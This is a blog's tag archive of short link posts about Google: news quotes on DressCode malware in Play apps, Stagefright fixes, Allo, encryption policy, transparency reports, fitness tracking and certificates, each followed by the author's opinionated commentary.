Tag: Google

Categories
Links

More than 400 malicious apps infiltrate Google Play

Ars Technica:

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”

BYOD: a great cost-saving policy. Until it leads to an attacker compromising your network and potentially exfiltrating business-vital resources.

Categories
Aside Links

Google’s latest IM client, Allo, isn’t ready for prime time

Ars Technica:

It’s no secret that Hangouts was poorly supported inside Google, so will Allo be any different? I’ve heard that Google Hangouts was never given resources because Google felt it would never be a money-maker. In instant messaging, you talk to your friends and send pictures back and forth, and an ad-powered Google service is never involved. With Allo, that changes because the Assistant is a gateway to search. Every question to the Assistant is a Google Search, with in-app answers coming for questions and links to generic Web searches for everything else. With search comes the possibility for ads, both from the generic search links and in the carousels that answers often provide. I’ve yet to see an advertisement inside Allo, but since it seems possible for Allo to make money, maybe it will receive more support than Hangouts did.

Setting aside the basic privacy issues of Google having access to unencrypted, plaintext, chats you have with friends and colleagues, the fact that Google is apparently unwilling to support its own products if they can’t be used to empower Google advertising is just gross. Google has impressively wasted the skills and talents of a generation of developers: imagine what might exist, today, if people were empowered to write software absent the need to data mine everything that is said for advertising purposes?

Categories
Links Writing

Google rebuilt a core part of Android to kill the Stagefright vulnerability for good

Google rebuilt a core part of Android to kill the Stagefright vulnerability for good:

Android’s security team patched the initial bug within weeks, but it inspired a wave of new attacks on the way Android processes audio and video files. The first copycat bugs were reported just days after the first patch, with more serious exploits arriving months later. The most recent Android patch report, released today, patches three separate vulnerabilities in Android’s media-processing function, including one critical flaw that could be used for remote code execution.

Now, Android is rebuilding that system from the ground up. When Android 7.0 Nougat began rolling out to phones last month, it came with a rebuilt media playback system, specifically designed to protect against the Stagefright family of attacks. In a post today, Android’s security team revealed new details on exactly how Nougat security has changed and what the team learned from last year’s string of bugs.

The vulnerability is more fully and truly patched! Hurray!

A shame that few users will ever receive an update to the new version of Android, let alone the patches in the previous (version 6) of Android. The best/easiest way for most users to ‘update’ an Android-based mobile phone is to throw their current phone in the trash and buy a new one…and even then, the phone they buy will likely lack recent patches. Heck, they’ll be lucky if it has the most recent operating system!

This stands directly in contrast to iOS. Apple can push out a global patch and there are remarkably high levels of uptake by end-users. Google’s method of working with handset manufacturers and carriers alike puts end-users are greater and greater risk. They’re simply making available dangerous products. They’re behaving worse than Microsoft in the Windows XP days!

Categories
Links Quotations

50 Sony BRAVIA TV models from 2012 will lose access to YouTube on Sept. 30

A hardware bug or defect is not the cause of the issue, but rather a specification change made on Google’s end that “exceed the capability of the TV’s hardware.”

SmartTVs are the future.

Categories
Links

Chrome starts retiring Flash in favor of HTML5

Thank god that this absolute blight on computer security is finally starting to be fully deprecated. Which means it should only continue to be a problem until the mid- to late-2020s as people gradually upgrade their devices to those which will not run Flash content by default…

Categories
Links Writing

New York DA Wants Apple, Google to Roll Back Encryption

New York DA Wants Apple, Google to Roll Back Encryption:

[Manhattan District Attorney Cyrus Vance Jr.] said that law enforcement officials did not need an encryption “backdoor,” sidestepping a concern of computer-security experts and device makers alike.

Instead, Vance said, he only wanted the encryption standards rolled back to the point where the companies themselves can decrypt devices, but police cannot. This situation existed until September 2014, when Apple pushed out iOS 8, which Apple itself cannot decrypt.

“Tim Cook was absolutely right when he told his shareholders that the iPhone changed the world,” Vance said. “It’s changed my world. It’s letting criminals conduct their business with the knowledge we can’t listen to them.”

Vance cited a recording of a telephone call made from New York City’s Riker’s Island jail to an outside line. In the call, a defendant in a sex-crimes case tells a friend about the miraculous powers of the new smartphone operating systems.

“Apple and Google came out with these softwares that can no longer by encrypted by the police,” the defendant allegedly said, mixing up encryption with decryption. “If our phones [are] running on iOS 8 software, they can’t open my phone. That might be another gift from God.”

Correct me if I’m wrong but if you’re able to quote the conversation they had about the encryption of the device, then isn’t it the case that law enforcement can, in fact, listen in to at least some of these supposedly sophisticated criminals? Regardless of their adoption of consumer-grade (i.e. incredibly common) tools and security protocols?

But more to the point: it has never been the case that government agencies have been able to compel, or access, all of the information they might find useful in the course of their investigations. That’s normal. Government agencies enjoyed incredible access to persons’ information for the course of a decade or so, as technology companies matured into firms that took the security and privacy of their customers seriously. Asking for the industry to return to a less-mature state is bad for everyone.

Finally: while domestic agencies might be worried about the situations where they cannot access the data at rest on the device, you can be sure that governmental staff who are abroad are very happy that they can use their devices with the knowledge that even foreign state actors will be challenged in accessing the data at rest which is stored on their smartphones. American (and Canadian) law enforcement agencies are understandably pushing for greater access to information but, by the same token, their success would mean that their compatriots in China, Brazil, France, Israel, and other friendly and unfriendly states would be able to lawfully gain entry to foreign agents’ devices. I’m pretty sure that diplomatic staff and military personel abroad are pleased that such an attack vector has been narrowed by Apple’s actions.

Categories
Links Writing

The Little-Known Loophole Obscuring Facebook and Google’s Transparency Reports

The Little-Known Loophole Obscuring Facebook and Google’s Transparency Reports:

The number of user data requests to Internet giants from foreign governments, are being lost in a legal loophole.

For some time I’ve been asking corporate executives how they do, or don’t, account for legal requests served by Canadian authorities on American social networking companies. And the obscurity has been noted in work I’ve previously published on this topic. In an admittedly selfish way, it’s terrific to see a Canadian reporter look into this issue further only to learn that the transparency numbers provided by Google et. al. do not fully account for non-US authorities’ requests for data.

Hopefully we’ll see other journalists, in countries the US has Mutual Legal Assistance Treaties (MLATs) with, file similar requests to better break down how many requests their domestic law enforcement agencies are issuing to the American companies responsible for storing and transiting so much of our personal data. While Google and other companies should be congratulated for their work it’s apparent that corporate transparency isn’t enough: we need better government accountability and corporate transparency to properly understand how, why, and how often authorities request (and receive) access to privately held telecommunications data.

Categories
Links Writing

How Apple and Google plan to reinvent healthcare

How Apple and Google plan to reinvent healthcare:

For many years the digital health industry has been driven by wearable devices like the Fitbit, Nike’s Fuelband, and Jawbone’s Up. But if the titans of the smartphone industry succeed in creating a dominant platform for health and fitness data, this business could be in trouble. “A lot of the basic functions we have seen in fitness wearables — tracking your steps, taking your heart rate — those functions will become basic features on a smartphone or smartwatch,” says Wang.

As someone who’s worn one of these trackers for years now [1] and who is obsessive about carrying my smartphone, I cannot disagree more. My phone does rough calculation of how much I move every month and it’s routinely off by absolutely enormous magnitudes. [2] To some extent, that’s because the phone isn’t calibrated to precisely monitor how far I walk. To a greater extent, however, it’s because while I’m obsessive about keeping my phone around me it’s actually not on my person for about 30% of my movements each day. I don’t carry my phone at night when walking the dog, or necessarily when I’m wander around the building I work in.

For people who want just casual or ambient information about movement a smartphone might be fine. But anyone who is even moderately interested in tracking their activity for health reasons isn’t going to be willing to ‘guesstimate’ 1/3 of their day’s activity. The real power of smartphones is delivering information-rich notifications or aggregating data from a variety of sensors; it’s the software that they bring, first and foremost, that is their value add. And I think that for the fitness device companies to be successful they’ll need to develop powerful data mobilization schemes – you’ll need to be able to integrate data from the fitness hardware to any smartphone OS – to really capture significant portions of the market over the longer-term. I don’t buy the idea that people will keep buying sub-par products because the data is bound within a specific operating system or mobile phone ecosystem. Though, perhaps that’s just me as someone who hops between smartphone and smartphone OSes every 12–14 months.

  1. I’ve lost a pair of Fitbits, returned another, and currently use a Jawbone UP 24. I bought my first Fitbit in April 2012.  ↩
  2. As an example, My Jawbone tracked me walking somewhere between 135–150 miles last month whereas Google suggested I walked just 30–40 miles.  ↩
Categories
Links

Crypto certificates impersonating Google and Yahoo pose threat to Windows users

Crypto certificates impersonating Google and Yahoo pose threat to Windows users:

OS currently has no reliable way to detect bogus credentials released into the wild.

Yet another reason why (a) the certificate authority system is broken; (b) Microsoft is stuck trying to fix problems that it (partially) brings upon itself; © Chrome is arguably the most secure – if not privacy protective – of the major Web browsers.

Categories
Aside Links

Google to deploy 180 low-orbit satellites that provide Internet access

Google to deploy 180 low-orbit satellites that provide Internet access:

Billion-dollar project will complement Google’s balloons and drones.

It would be particularly interesting to see if Google tried to marry its satellites with its Loom project, to the effect of not having to integrate Loom balloon networks with known censorious ISPs in various countries around the world. If Google could  overcome technical and regulatory hurdles it could, by routing through space, try to proxy data access via ‘open’ Internet nations. Of course, this would mean that Google would become the ‘real’ pipe to the Internet itself…